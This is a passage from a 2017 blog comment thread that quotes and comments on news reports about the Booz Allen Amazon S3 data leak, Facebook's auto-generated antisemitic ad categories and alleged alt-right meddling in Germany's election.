    And now, any future attacks on US elections or the US electrical grid that can somehow be pinned on the Russians is going to trigger some sort of painful wave or retaliatory cyberbombs. Which, of course, will likely trigger a way of counter-retaliatory cyberbombs in the US. And a full-scale cyberwar will be born and we’ll just have to hope it stays in the cyber domain. That’s were we are now based on a CIA spy in the Kremlin and an unnamed foreign intelligence agency.

    Posted by Pterrafractyl | June 23, 2017, 2:48 pm
  12. Here’s a pair of stories that are only tangentially related to the high profile 2016 DNC hacks and is really more a prelude to some yet-to-happen hacks of sensitive government. It’s also exciting news for people who like to routinely scan the Amazon Cloud searching for servers left accidentally vulnerable to the public: The Amazon Cloud is joining IBM and Microsoft as one of three private companies available for hosting the US Department of Defense’s most sensitive unclassified data:

    NextGov

    Amazon Web Services Can Now Host the Defense Department’s Most Sensitive Data

    By Frank Konkel
    September 13, 2017

    Amazon Web Services has a new market for its cloud computing, analytics, and storage services.

    This week, the Defense Department granted the cloud computing giant a provisional authorization to host Impact Level 5 workloads, which are the military and Pentagon’s most sensitive, unclassified information.

    “This further bolsters AWS as an industry leader in helping support the DoD’s critical mission in protecting our security,” the company said in a statement. “The AWS services support a variety of DoD workloads, including workloads containing sensitive controlled unclassified information and National Security Systems information.”

    Already, DoD is using AWS to host sensitive, mission-critical workloads, including the operational control system for the Global Positioning System. The provisional authorization allows military customers an easier route to use AWS for a variety of other IT services.

    In total, three commercial companies—AWS, IBM and Microsoft—are now able to host and store the military’s most sensitive unclassified data. AWS has expanded its defense business, it remains the dominant cloud service provider in the intelligence community by virtue of its its $600 million contract with the Central Intelligence Agency. AWS’ C2S cloud hosts classified information for the 17 intelligence agencies.

    ———-

    “Amazon Web Services Can Now Host the Defense Department’s Most Sensitive Data” by Frank Konkel; NextGov; 09/13/2017

    “In total, three commercial companies—AWS, IBM and Microsoftare now able to host and store the military’s most sensitive unclassified data. AWS has expanded its defense business, it remains the dominant cloud service provider in the intelligence community by virtue of its $600 million contract with the Central Intelligence Agency. AWS’ C2S cloud hosts classified information for the 17 intelligence agencies.”

    Yep, the Amazon Web Services (AWS) are already being hosting classified information for 17 US intelligence agencies, led by a $600 million contract with the CIA. A contract that involved Amazon developing a completely separate cloud infrastructure with extra layers of security, including being completely separate from the rest of the internet and extra encryption.

    But it sounds like this recent rule change that allows for unclassified, but still highly sensitive, data doesn’t involve that separate extra secure cloud. It’s just the regular Amazon AWS. What could possibly go wrong? Well, here’s a story from back in May starring Booz Allen Hamilton (Edward Snowden’s brief employer) that’s a pretty good example of what could go wrong:

    Gizmodo

    Top Defense Contractor Left Sensitive Pentagon Files on Amazon Server With No Password [Updated]

    Dell Cameron
    5/31/17 9:40am

    Sensitive files tied to a US military project were leaked by a multi-billion dollar firm once described as the world’s most profitable spy operation, Gizmodo has confirmed.

    A cache of more than 60,000 files was discovered last week on a publicly accessible Amazon server, including passwords to a US government system containing sensitive information, and the security credentials of a lead senior engineer at Booz Allen Hamilton, one of the nation’s top intelligence and defense contractors. What’s more, the roughly 28GB of data contained at least a half dozen unencrypted passwords belonging to government contractors with Top Secret Facility Clearance.

    The exposed credentials could potentially grant their holders further access to repositories housing similarly sensitive government data.

    Countless references are made in the leaked files to the US National Geospatial-Intelligence Agency (NGA), which in March awarded Booz Allen an $86 million defense contract. Often referred to as the Pentagon’s “mapmakers,” the combat support agency works alongside the Central Intelligence Agency, the National Reconnaissance Office, and the Defense Intelligence Agency to collect and analyze geospatial data gathered by spy satellites and aerial drones.

    The NGA on Tuesday confirmed the leak to Gizmodo while stressing that no classified information had been disclosed. “NGA takes the potential disclosure of sensitive but unclassified information seriously and immediately revoked the affected credentials,” an agency spokesperson said. The Amazon server from which the data was leaked was “not directly connected to classified networks,” the spokesperson noted.

    UpGuard cyber risk analyst Chris Vickery discovered the Booz Allen server last week while at his Santa Rosa home running a scan for publicly accessible s3 buckets (what Amazon calls its cloud storage devices). At first there was no reason to suspect it contained sensitive military data. Typically, US government servers hosted by Amazon are segregated into what’s called the GovCloud—a “gated community” protected by advanced cryptography and physical security. Instead, the Booz Allen bucket was found in region “US-East-1,” chiefly comprised of public and commercial data.

    Yet the files bore some hallmarks of a government project. First, Vickery spotted the public and private SSH keys of a Booz Allen employee, identified by his LinkedIn page as a lead senior engineer in Virginia—also home to the NGA’s Fort Belvoir campus. “Exposing a private key belonging to a Booz Allen IT engineer is potentially catastrophic for malicious intrusion possibilities,”he said.

    SSH keys employ what’s called public-key cryptography and challenge-response authentication. Essentially, Booz Allen stores sensitive data in the cloud, and before the engineer can access it, his private key must pair successfully with a public key on Booz Allen’s server. This protocol only really works, however, so long as the employee’s private key remains a secret.

    “Booz Allen takes any allegation of a data breach very seriously, and promptly began an investigation into the accessibility of certain security keys in a cloud environment,” a Booz Allen spokesman told Gizmodo on Tuesday. “We secured those keys, and are continuing with a detailed forensic investigation. As of now, we have found no evidence that any classified information has been compromised as a result of this matter.”

    Mark Zaid, a Washington lawyer who specializes in national security cases, said the incident is likely to dredge up bad memories of the company. “The first thing that jumps to mind,” he said, is “Oh, no. It’s Booz Allen again.”
    The NGA on Tuesday confirmed the leak to Gizmodo while stressing that no classified information had been disclosed. “NGA takes the potential disclosure of sensitive but unclassified information seriously and immediately revoked the affected credentials,” an agency spokesperson said. The Amazon server from which the data was leaked was “not directly connected to classified networks,” the spokesperson noted.
    Zaid was referring to Edward Snowden, the former NSA contractor who worked for Booz Allen when he fled to Hong Kong in 2013 with a trove of classified material. Another of the firm’s employees, Harold Martin III, was arrested last year and charged under the Espionage Act after federal agents discovered over 50 terabytes of classified data in his residence, the trunk of his car and in an unlocked outdoor shed.

    “Obviously, Booz Allen is a large company and a well-respected defense contractor,” Zaid added. “And none of these cases are necessarily related to one another. But it still raises some real serious concerns about what’s going on with Booz Allen’s security protocols.”

    In addition to keys, the Booz Allen server contained master credentials to a datacenter operating system—and others used to access the GEOAxIS authentication portal, a protected Pentagon system that usually requires an ID card and special computer to use. Yet another file contained the login credentials of a separate Amazon bucket, the contents of which remain a mystery; there’s no way to verify the contents legally since the bucket is secured by a password, and thus not open to the public.

    Moreover, a categorization script found in one of the Booz Allen files indicates the system under construction is at least designed to handle classified information. And while Vickery didn’t realize its significance at the time, the leaked files also appear connected to a third server he found open last month.

    In April, he discovered an Amazon bucket with no password containing a review of what he now believes is the same NGA system. An “application security risk assessment,” carried out using HP software called Fortify, detailed 3039 issues within the program’s source code (only 7 were described as critical). “I’m reading the report,” he says, “and the code snippets line up with code from the second bucket.”

    The mission of UpGuard’s Cyber Risk Team is to locate and secure leaked sensitive records, so Vickery’s first email on Wednesday was to Joe Mahaffee, Booz Allen’s chief information security officer. But after receiving no immediate response, he went directly the agency. “I emailed the NGA at 10:33am on Thursday. Public access to the leak was cut off nine minutes later,” he said.

    “You can have fantastic cybersecurity, but if you’re using IT systems to share information with a partner whose cybersecurity isn’t up to snuff, then your protection measures don’t mean very much,” says Paulo Shakarian, a cybersecurity fellow at the Washington think-tank New America. The big unresolved question, he says, is whether Booz Allen had proper security protocols in place for its contractors working on the NGA project. “And likewise, what has NGA done to ensure that the proper protective measures were in place.”

    NGA informed Gizmodo that it was still evaluating the incident and had yet to determine a proper course of action. “It’s important to note that a misconfiguration, properly reported and addressed, does not disqualify industry partners from doing business with NGA,” the agency said, adding that it reserves the right to “address any violations or patterns of non-compliance appropriately.”

    Update: June 1st, 6:04pm ET: Booz Allen Hamilton sent Gizmodo the following statement:

    Both our client and Booz Allen have confirmed that no classified data was available on the impacted unclassified cloud environments. And we have confirmed that none of those usernames and passwords could have been used to access classified information. This appears to be a case in which an employee unintentionally left a key within an unclassified cloud environment where multiple users can develop software in an open environment. As soon as we learned of this mistake, we took action to secure the areas and alerted our client and began an investigation. Again, the important point here is that the affected cloud areas were not designed to contain any classified information. Our client has said they’ve found no evidence that classified data was involved, and so far our forensics have indicated the same. While any incident of this nature is unacceptable and we hope to learn from it, so far we see this event as having limited impact.

    ———-

    “Top Defense Contractor Left Sensitive Pentagon Files on Amazon Server With No Password [Updated]” by Dell Cameron; Gizmodo; 05/31/17

    UpGuard cyber risk analyst Chris Vickery discovered the Booz Allen server last week while at his Santa Rosa home running a scan for publicly accessible s3 buckets (what Amazon calls its cloud storage devices). At first there was no reason to suspect it contained sensitive military data. Typically, US government servers hosted by Amazon are segregated into what’s called the GovCloud—a “gated community” protected by advanced cryptography and physical security. Instead, the Booz Allen bucket was found in region “US-East-1,” chiefly comprised of public and commercial data.”

    Fun times ahead for all the people who routinely scan publicly accessible AWS “buckets” for vulnerabilities. You just might stumble upon unprotected files from the US National Geospatial-Intelligence Agency (NGA). Or maybe you’ll find a bunch of passwords and private SSH keys that will allow you to break into other sensitive systems:


    Yet the files bore some hallmarks of a government project. First, Vickery spotted the public and private SSH keys of a Booz Allen employee, identified by his LinkedIn page as a lead senior engineer in Virginia—also home to the NGA’s Fort Belvoir campus. “Exposing a private key belonging to a Booz Allen IT engineer is potentially catastrophic for malicious intrusion possibilities,”he said.

    SSH keys employ what’s called public-key cryptography and challenge-response authentication. Essentially, Booz Allen stores sensitive data in the cloud, and before the engineer can access it, his private key must pair successfully with a public key on Booz Allen’s server. This protocol only really works, however, so long as the employee’s private key remains a secret.

    And maybe you’ll even find files associated with a vulnerable “bucket” you discovered months earlier:


    Moreover, a categorization script found in one of the Booz Allen files indicates the system under construction is at least designed to handle classified information. And while Vickery didn’t realize its significance at the time, the leaked files also appear connected to a third server he found open last month.

    In April, he discovered an Amazon bucket with no password containing a review of what he now believes is the same NGA system. An “application security risk assessment,” carried out using HP software called Fortify, detailed 3039 issues within the program’s source code (only 7 were described as critical). “I’m reading the report,” he says, “and the code snippets line up with code from the second bucket.”

    Yes, this same security analyst discovered an Amazon bucket months earlier with no password containing an “application security risk assessment” revealing software vulnerabilities. And the analyst is pretty sure that the application security risk assessment was an assessment for the same system that was being developed on the vulnerable bucket he discovered back in May. And it appears to be a system designed to handle classified information.

    So while this publicly available Amazon bucket didn’t contain classified information, it did appear to be the development environment for a system designed to handle classified information. And that’s a story from months before the DoD granted Amazon a provisional authorization to host Impact Level 5 workloads, the military and Pentagon’s most sensitive, unclassified information, on its cloud.

    And that all means we should get ready for lots of fun future stories about how a bunch of sensitive data was stolen off a publicly accessible Amazon web server used by a national security contractor followed up with a bunch of assurances that no one should worry because it was just unclassified data that was stolen.

    Posted by Pterrafractyl | September 19, 2017, 2:53 pm
  13. Here’s a pair of stories that, at best, are a reminder of the potential for algorithms and AI systems to acquire the hate and bigotry of their human creators. And, at worst, are a reminder that the potential for algorithms and AI systems to acquire the hate and bigotry of their human creators might be a great excuse for companies like Facebook to push a far-right agenda and just go “oops!” when they get caught.

    The second article is also a reminder of what we witnessed following the hack of the French election: that the US and Europe remain dangerously hyperfocused on the potential for Russian election meddling to the exclusion of almost any other force on the world stage (like the far-right movements that exist in every country on the planet and clearly want to meddle in elections.

    But first, check out the advertising categories Facebook’s algorithms auto-generated:

    Propublica

    Facebook Enabled Advertisers to Reach ‘Jew Haters’
    After being contacted by ProPublica, Facebook removed several anti-Semitic ad categories and promised to improve monitoring.

    by Julia Angwin, Madeleine Varner and Ariana Tobin
    Sept. 14, 4 p.m. EDT

    Want to market Nazi memorabilia, or recruit marchers for a far-right rally? Facebook’s self-service ad-buying platform had the right audience for you.

    Until this week, when we asked Facebook about it, the world’s largest social network enabled advertisers to direct their pitches to the news feeds of almost 2,300 people who expressed interest in the topics of “Jew hater,” “How to burn jews,” or, “History of ‘why jews ruin the world.’”

    To test if these ad categories were real, we paid $30 to target those groups with three “promoted posts” — in which a ProPublica article or post was displayed in their news feeds. Facebook approved all three ads within 15 minutes.

    After we contacted Facebook, it removed the anti-Semitic categories — which were created by an algorithm rather than by people — and said it would explore ways to fix the problem, such as limiting the number of categories available or scrutinizing them before they are displayed to buyers.

    “There are times where content is surfaced on our platform that violates our standards,” said Rob Leathern, product management director at Facebook. “In this case, we’ve removed the associated targeting fields in question. We know we have more work to do, so we’re also building new guardrails in our product and review processes to prevent other issues like this from happening in the future.”

    Facebook’s advertising has become a focus of national attention since it disclosed last week that it had discovered $100,000 worth of ads placed during the 2016 presidential election season by “inauthentic” accounts that appeared to be affiliated with Russia.

    Like many tech companies, Facebook has long taken a hands off approach to its advertising business. Unlike traditional media companies that select the audiences they offer advertisers, Facebook generates its ad categories automatically based both on what users explicitly share with Facebook and what they implicitly convey through their online activity.

    Traditionally, tech companies have contended that it’s not their role to censor the Internet or to discourage legitimate political expression. In the wake of the violent protests in Charlottesville by right-wing groups that included self-described Nazis, Facebook and other tech companies vowed to strengthen their monitoring of hate speech.

    Facebook CEO Mark Zuckerberg wrote at the time that “there is no place for hate in our community,” and pledged to keep a closer eye on hateful posts and threats of violence on Facebook. “It’s a disgrace that we still need to say that neo-Nazis and white supremacists are wrong — as if this is somehow not obvious,” he wrote.

    But Facebook apparently did not intensify its scrutiny of its ad buying platform. In all likelihood, the ad categories that we spotted were automatically generated because people had listed those anti-Semitic themes on their Facebook profiles as an interest, an employer or a “field of study.” Facebook’s algorithm automatically transforms people’s declared interests into advertising categories.

    Here is a screenshot of our ad buying process on the company’s advertising portal:
    [see screenshot]

    This is not the first controversy over Facebook’s ad categories. Last year, ProPublica was able to block an ad that we bought in Facebook’s housing categories from being shown to African-Americans, Hispanics and Asian-Americans, raising the question of whether such ad targeting violated laws against discrimination in housing advertising. After ProPublica’s article appeared, Facebook built a system that it said would prevent such ads from being approved.

    Last year, ProPublica also collected a list of the advertising categories Facebook was providing to advertisers. We downloaded more than 29,000 ad categories from Facebook’s ad system — and found categories ranging from an interest in “Hungarian sausages” to “People in households that have an estimated household income of between $100K and $125K.”

    At that time, we did not find any anti-Semitic categories, but we do not know if we captured all of Facebook’s possible ad categories, or if these categories were added later. A Facebook spokesman didn’t respond to a question about when the categories were introduced.

    Last week, acting on a tip, we logged into Facebook’s automated ad system to see if “Jew hater” was really an ad category. We found it, but discovered that the category — with only 2,274 people in it — was too small for Facebook to allow us to buy an ad pegged only to Jew haters.

    Facebook’s automated system suggested “Second Amendment” as an additional category that would boost our audience size to 119,000 people, presumably because its system had correlated gun enthusiasts with anti-Semites.

    Instead, we chose additional categories that popped up when we typed in “jew h”: “How to burn Jews,” and “History of ‘why jews ruin the world.’” Then we added a category that Facebook suggested when we typed in “Hitler”: a category called “Hitler did nothing wrong.” All were described as “fields of study.”

    These ad categories were tiny. Only two people were listed as the audience size for “how to burn jews,” and just one for “History of ‘why jews ruin the world.’”” Another 15 people comprised the viewership for “Hitler did nothing wrong.”

    Facebook’s automated system told us that we still didn’t have a large enough audience to make a purchase. So we added “German Schutzstaffel,” commonly known as the Nazi SS, and the “Nazi Party,” which were both described to advertisers as groups of “employers.” Their audiences were larger: 3,194 for the SS and 2,449 for Nazi Party.

    Still, Facebook said we needed more — so we added people with an interest in the National Democratic Party of Germany, a far-right, ultranationalist political party, with its much larger viewership of 194,600.

    Once we had our audience, we submitted our ad — which promoted an unrelated ProPublica news article. Within 15 minutes, Facebook approved our ad, with one change. its approval screen, Facebook described the ad targeting category “Jew hater” as “Antysemityzm,” the Polish word for anti-Semitism. Just to make sure it was referring to the same category, we bought two additional ads using the term “Jew hater” in combination with other terms. Both times, Facebook changed the ad targeting category “Jew hater” to “Antisemityzm” in its approval.

    Here is one of our approved ads from Facebook:
    [see screenshot]

    A few days later, Facebook sent us the results of our campaigns. Our three ads reached 5,897 people, generating 101 clicks, and 13 “engagements” — which could be a “like” a “share” or a comment on a post.

    Since we contacted Facebook, most of the anti-Semitic categories have disappeared.

    Facebook spokesman Joe Osborne said that they didn’t appear to have been widely used. “We have looked at the use of these audiences and campaigns and it’s not common or widespread,” he said.

    ———-

    “Facebook Enabled Advertisers to Reach ‘Jew Haters’” by Julia Angwin, Madeleine Varner and Ariana Tobin; Propublica; 09/14/2017

    “To test if these ad categories were real, we paid $30 to target those groups with three “promoted posts” — in which a ProPublica article or post was displayed in their news feeds. Facebook approved all three ads within 15 minutes.”

    $30 to advertise to Facebook’s “Jew Haters”. And it was approved in 15 minutes. But it wasn’t just the “Jew Haters” targeted with his $30 ad buy because there were enough to meet the minimum number of people Facebook requires for these kinds of purchases. So other categories had to be added. Categories apparently generated automatically based on user activity:


    After we contacted Facebook, it removed the anti-Semitic categories — which were created by an algorithm rather than by people — and said it would explore ways to fix the problem, such as limiting the number of categories available or scrutinizing them before they are displayed to buyers.

    And it wasn’t until Propublica added the category for Germany’s neo-Nazi National Democratic Party (NDP) that they finally had enough people in their collection of hate categories to meet the minimum number of target Facebook users required for the ad buy to be placed:


    Last week, acting on a tip, we logged into Facebook’s automated ad system to see if “Jew hater” was really an ad category. We found it, but discovered that the category — with only 2,274 people in it — was too small for Facebook to allow us to buy an ad pegged only to Jew haters.

    Facebook’s automated system suggested “Second Amendment” as an additional category that would boost our audience size to 119,000 people, presumably because its system had correlated gun enthusiasts with anti-Semites.

    Instead, we chose additional categories that popped up when we typed in “jew h”: “How to burn Jews,” and “History of ‘why jews ruin the world.’” Then we added a category that Facebook suggested when we typed in “Hitler”: a category called “Hitler did nothing wrong.” All were described as “fields of study.”

    These ad categories were tiny. Only two people were listed as the audience size for “how to burn jews,” and just one for “History of ‘why jews ruin the world.’”” Another 15 people comprised the viewership for “Hitler did nothing wrong.”

    Facebook’s automated system told us that we still didn’t have a large enough audience to make a purchase. So we added “German Schutzstaffel,” commonly known as the Nazi SS, and the “Nazi Party,” which were both described to advertisers as groups of “employers.” Their audiences were larger: 3,194 for the SS and 2,449 for Nazi Party.

    Still, Facebook said we needed more — so we added people with an interest in the National Democratic Party of Germany, a far-right, ultranationalist political party, with its much larger viewership of 194,600.

    “Still, Facebook said we needed more — so we added people with an interest in the National Democratic Party of Germany, a far-right, ultranationalist political party, with its much larger viewership of 194,600.”

    In a way it’s at least a little relieving that categories like “Hitler did nothing wrong” only had 15 users Facebook identified as a target audience for that category. It could be worse! Like, say 194,600 users, which is the number of people in the NPD target audience. But it’s also pretty disturbing that Facebook made it so cheap and easy to target this global hate audience.

    And, again, at best this really was just an algorithmic ‘oops’ but we can’t rule out the possibility that a corporate giant like Facebook which the far-right figurehead Peter Thiel on its board, is quietly trying to capture and foster far-right audiences.

    But according to Facebook this was all an innocent mistake. Let’s hope so. And let’s also hope the sudden discovery that Facebook in Germany has prioritizing far-right political parties like the AfD when people do a search for political discussions was also just an innocent mistake. As the following article notes, it’s one of the many discoveries about the role the ‘Alt-Right’ is playing in Germany’s current elections and it’s a role that doesn’t appear to include a Kremlin counterpart. Despite widespread fears that all sorts of Russian dirty tricks were inevitably going to be injected into the race. But as far as observers can tell, it’s just the ‘Alt-Right’ that’s flooding German social media sites with far-right messages and it specifically appears to be American ‘Alt-Right’ people doing this. Apparntly with the help of another Facebook pro-far-right ‘whoops! How did that happen?’:

    USA Today

    There is meddling in Germany’s election — not by Russia, but by U.S. right wing

    Kim Hjelmgaard, Published 11:31 a.m. ET Sept. 20, 2017

    Less than a week before Sunday’s vote that is likely to hand German Chancellor Angela Merkel a fourth term, evidence of anticipated Russian meddling has yet to materialize, but U.S. right-wing groups have interfered, according to German researchers.

    “So far we have not been able to track down any specific Russian activity,” said Simon Hegelich,” a professor of political science data at the Technical University of Munich who has advised the German government about the threat of hacking and fake news.

    Instead, Hegelich and others point to an alliance of mostly anonymous online trolls and extremist agitators who are disseminating right-wing materials through YouTube; messaging board sites like 4chan and reddit; and Gab.ai, a texting service.

    “A lot of the stuff we are seeing in Germany can be linked to, or is at least inspired by, the ‘alt-right’ movement in the U.S.,” Hegelich said, referring to a loosely defined group whose far-right ideology includes racism, populism and white nationalism.

    He said proving connections among sympathizers is extremely difficult and may never be conclusive. But an analysis of 300 million tweets over the past six months by Hegelich and researchers at the Technical University of Munich shows Germany is a hotspot for posts that use the hashtag “#AltRight.”

    Many denigrate both leading candidates — Merkel and her conservative Christian Democratic Union party, and her chief rival, Martin Schulz of the left-of-center Social Democratic Party — with the hashtags #Merkel and #Schulz.

    And many of those posts originate in the U.S., adding to the impression that right-wing social media users in both countries may be trying to sway German public opinion. It’s possible that some of this alt-right messaging coming out of the U.S. may be connected to Russian interference; that, too, is difficult to determine, Hegelich said.

    “There will never be an election again in which trolling, hacking and extreme far-right politics do not play a role,” Andrew Auernheimer, a hacker and blogger for the U.S. neo-Nazi Daily Stormer website wrote after Donald Trump’s election victory last year.

    The Daily Stormer has been available intermittently since August after major technology firms including Google forced the site offline for comments about the death of Heather Heyer by an alt-right protester in Charlottesville, Va. Nevertheless, the website continues to publish commentaries about the German election.

    “There is essentially no chance that the AfD (Alternative for Germany party) can win this election,” Adrian Sol wrote Sunday on the site, referring to Germany’s far-right anti-immigration and anti-European Union party.

    “However, if they can keep putting pressure on the establishment and change the narrative, (there) may be hope yet that Germany can some day be saved.”

    A report published Wednesday by Hope Not Hate, a British anti-racism watchdog, concluded that the alt-right movement has “breathed life and youth back into formerly declining and dormant parts of the European extreme right.”

    The report, based on an undercover investigation of far-right figureheads, found that extremist individuals, organizations, websites and forums on both sides of the Atlantic are increasingly engaging with each another and “weaponizing” the Internet.

    Sandro Gaycken, the founder and director of the Berlin-based Digital Society Institute, said right-wing voices are trying to infiltrate conversations about the German election on Facebook and other social media platforms.

    One example: Gaycken said for the past two months, new and existing Facebook users in Germany who search for political discussion groups on the social media platform have been automatically given recommendations that prioritize right-wing parties such as AfD, expected to enter the country’s national parliament for the first time after Sunday’s vote.

    “It’s really strange because Facebook says this should be impossible because you are only supposed to get recommendations based on your own ‘friends,’ ‘groups’ and ‘likes.’ But everyone in Germany is getting these right-wing party recommendations,” he said.

    “Even left-wing journalists.”

    In a statement, Facebook said it was aware of the issue reported in Germany and that it was related to its “Groups Discover” feature, and that it has now temporarily turned off the category “news and politics” in the “Discover” tab while it investigates the matter.

    Facebook said it was also examining the accounts of apparently fake users who purchased Facebook ads during the U.S. election. These accounts were subsequently linked to the pro-Kremlin troll farm known as the Internet Research Agency. Facebook said that it has not yet uncovered similar ad purchases related to the German vote.

    “We haven’t seen any trace of the Russians, just right-wingers,” Gaycken added.

    According to polls published by German media Sunday, Merkel’s party is projected to win 36% of the vote, well ahead of Schulz’s SPD on 22%. AfD is forecast to come in third, with 11%. If Merkel wins, she could forge ahead with plans to pursue closer political and economic union with EU members, a policy as deeply unpopular with AfD’s supporters as her decision to open Germany’s borders to 1 million refugees since 2015.

    Germany’s vulnerability to political hackers, Internet trolls and bots linked to Russia is hard to gauge. Plus, there may not be much point doing so, according to Mark Galeotti, who runs the Center for European Security, a research institute in Prague.

    “There is no ‘pro-Putin’ candidate,” he said.

    “Any interference would be unlikely to have any substantive impact on the election result and only harden Germany’s position against Moscow.”

    Merkel has nevertheless sought to blunt potential Russian interference through aggressive public information campaigns, by establishing additional cybersecurity agencies and strategies and by ushering in the Network Enforcement Act, a law that come this October will fine social media companies up to $57 million if they do not remove hate speech, defamation and incitements to violence within 24 hours.

    German political parties also pledged not to use social bots in the election campaign, and independent media monitoring organizations such as Correctiv, which debunk fake news and call out disinformation, have been established recently.

    The government has insisted the software used to tabulate votes — paper ballots are hand-counted and then passed to regional authorities — is secure despite a study published Sept. 7. by the Chaos Computer Club, a German technology watchdog, showing the system’s encryption method was outdated and vulnerable to manipulation.

    But what may seem like a lack of interest from Moscow may just be a sign of success.

    “I think there is more Russian activity than meets the eye,” said Joerg Forbrig, a Berlin-based political affairs expert at the German Marshall Fund of the United States, a public policy think tank whose Alliance for Securing Democracy unit built an online tool that tracks Russian propaganda and disinformation efforts. Its “Hamilton 68” dashboard analyzes about 600 Twitter accounts directly controlled by Russia, by users who promote Russian themes, and by users and topics Russia seeks to discredit or attack.

    “In the past we have seen a very systematic and skilled outreach program into Germany’s Russian-speaking population. This was first tested in state elections in Berlin last September. In those areas where there are very high numbers of Russian speakers living in Berlin, the AfD’s vote share was up to 35%,” Forbrig said.

    He said these campaigns involved circulating posters and leaflets with messages that were inimical to the German government’s position on Russian sanctions or NATO.

    Forbrig said there could be forms of Russian support for the AfD not yet recognized.

    The Alliance for Securing Democracy has concluded that Russia has meddled in the affairs of at least 27 European and North American countries since 2004 with interference that ranges from cyberattacks to disinformation campaigns.

    In 2015, a Russian-intelligence-linked hacking group called Fancy Bear stole data from German parliamentarians, including Merkel. This data has yet to be released to the public. Fancy Bear is the same group thought to be behind the hacks of the Democratic National Committee in the run up to the U.S. election. Moscow repeatedly has dismissed allegations it intervenes in elections as anti-Russian propaganda.

    Still, Forbrig added the German election may be less susceptible to outside influence for three reasons: Voters watched alleged Russian meddling take place in the U.S. and French elections, which has led to high levels of awareness; Germany’s multi-party electoral system makes it more difficult to predict how messages and information targeted at one group might impact others; and Germany’s media is, Forbrig said, generally more “balanced and calm” and lacks “shrill voices” compared to its counterparts elsewhere. Further, its media is still viewed as a trusted source of information — not always the case in President Trump’s Washington.

    ———–

    “There is meddling in Germany’s election — not by Russia, but by U.S. right wing” by Kim Hjelmgaard; USA Today; 09/20/2017

    “”So far we have not been able to track down any specific Russian activity,” said Simon Hegelich,” a professor of political science data at the Technical University of Munich who has advised the German government about the threat of hacking and fake news.”

    No Russian nefariousness to be find. Phew! Oh wait:


    Instead, Hegelich and others point to an alliance of mostly anonymous online trolls and extremist agitators who are disseminating right-wing materials through YouTube; messaging board sites like 4chan and reddit; and Gab.ai, a texting service.

    “A lot of the stuff we are seeing in Germany can be linked to, or is at least inspired by, the ‘alt-right’ movement in the U.S.,” Hegelich said, referring to a loosely defined group whose far-right ideology includes racism, populism and white nationalism.

    He said proving connections among sympathizers is extremely difficult and may never be conclusive. But an analysis of 300 million tweets over the past six months by Hegelich and researchers at the Technical University of Munich shows Germany is a hotspot for posts that use the hashtag “#AltRight.”

    Many denigrate both leading candidates — Merkel and her conservative Christian Democratic Union party, and her chief rival, Martin Schulz of the left-of-center Social Democratic Party — with the hashtags #Merkel and #Schulz.

    And many of those posts originate in the U.S., adding to the impression that right-wing social media users in both countries may be trying to sway German public opinion. It’s possible that some of this alt-right messaging coming out of the U.S. may be connected to Russian interference; that, too, is difficult to determine, Hegelich said.

    Yep, the Alt-Right doesn’t need the Kremlin’s troll farm to get its message out. The ‘Alt-Right’ is a troll farm. A virtual troll farm that has its sites set on ensuring the AfD and other far-right parties do as well as possible.

    And this virtual troll farm has had some big help apparently. From Facebook of course:


    Sandro Gaycken, the founder and director of the Berlin-based Digital Society Institute, said right-wing voices are trying to infiltrate conversations about the German election on Facebook and other social media platforms.

    One example: Gaycken said for the past two months, new and existing Facebook users in Germany who search for political discussion groups on the social media platform have been automatically given recommendations that prioritize right-wing parties such as AfD, expected to enter the country’s national parliament for the first time after Sunday’s vote.

    “It’s really strange because Facebook says this should be impossible because you are only supposed to get recommendations based on your own ‘friends,’ ‘groups’ and ‘likes.’ But everyone in Germany is getting these right-wing party recommendations,” he said.

    “Even left-wing journalists.”

    In a statement, Facebook said it was aware of the issue reported in Germany and that it was related to its “Groups Discover” feature, and that it has now temporarily turned off the category “news and politics” in the “Discover” tab while it investigates the matter.

    Facebook said it was also examining the accounts of apparently fake users who purchased Facebook ads during the U.S. election. These accounts were subsequently linked to the pro-Kremlin troll farm known as the Internet Research Agency. Facebook said that it has not yet uncovered similar ad purchases related to the German vote.

    “We haven’t seen any trace of the Russians, just right-wingers,” Gaycken added.

    “”It’s really strange because Facebook says this should be impossible because you are only supposed to get recommendations based on your own ‘friends,’ ‘groups’ and ‘likes.’ But everyone in Germany is getting these right-wing party recommendations,” he said. ”

    Everyone in Germany is getting right-wing parties recommended to them on Facebook. And apparently this is only the case for right-wing parties. Another algorithmic ‘oops!’? Is the virtual troll farm somehow gaming the system? Or is Facebook actually quietly trying to use its immense power to promote the far-right? It’s a question we’re once again forced to ask.

    Another thing we should keep in mind related to the the Bundestag hack of 2015 as an example of a high profile political hack from Russian that Germany has already had to deal with:


    In 2015, a Russian-intelligence-linked hacking group called Fancy Bear stole data from German parliamentarians, including Merkel. This data has yet to be released to the public. Fancy Bear is the same group thought to be behind the hacks of the Democratic National Committee in the run up to the U.S. election. Moscow repeatedly has dismissed allegations it intervenes in elections as anti-Russian propaganda.

    That 2015 hack isn’t just related to the DNC hack because Fancy Bear was attributed with the hack in both cases. They’re also related by the fact that the same command and control server was used in both hacks. And we know this because both hacks utilized unencrypted malware that inexplicably hard coded the I.P. address of the command and control server and that command and control server was apparently utilizing a version of OpenSSL that would have made it vulnerable to the Heartbleed attack. In other words, that command and control server that was used for both the Bundestag hack of 2015 and DNC hack of 2016 was vulnerable to effectively being hijacked and shared by multiple hacking groups.

    Thus far there doesn’t appear to be a big hack impacting Germany’s election and there isn’t much time left if it’s going to happen (the vote is on Sunday). But if there is, let’s not forget that, despite the fact that the big Macron hack in France’s elections continues to be routinely attributed to Russia in the US media and the NSA even said it was sure it was Russia, the French chief of cybersecurity said France had no evidence Russsia did the hack, and the NSA refused to provide France evidence of Russian attribution, and the pubicly available evidence of how the hacked documents were leaked online strongly suggests that it was neo-Nazi hacker Andrew “the weev” Auernheimer who actually carried out the hack. So when you read the comment about how the French elections were hack by Russians like this one…


    Still, Forbrig added the German election may be less susceptible to outside influence for three reasons: Voters watched alleged Russian meddling take place in the U.S. and French elections, which has led to high levels of awareness; Germany’s multi-party electoral system makes it more difficult to predict how messages and information targeted at one group might impact others; and Germany’s media is, Forbrig said, generally more “balanced and calm” and lacks “shrill voices” compared to its counterparts elsewhere. Further, its media is still viewed as a trusted source of information — not always the case in President Trump’s Washington.

    …don’t forget that the big Macron hack also appears to have American ‘Alt-Right’ neo-Nazi origins.

    Also note that, while the far-right troll army aggressively trying to get Marine Le Pen elected really was indeed comprised of French far-rightist, the National Front was using an ‘Alt-Right’ “Foreign Legion” on social media too.

    Which shouldn’t be too surprising. As Andrew Auernheimer told the world after Donald Trump’s victory:


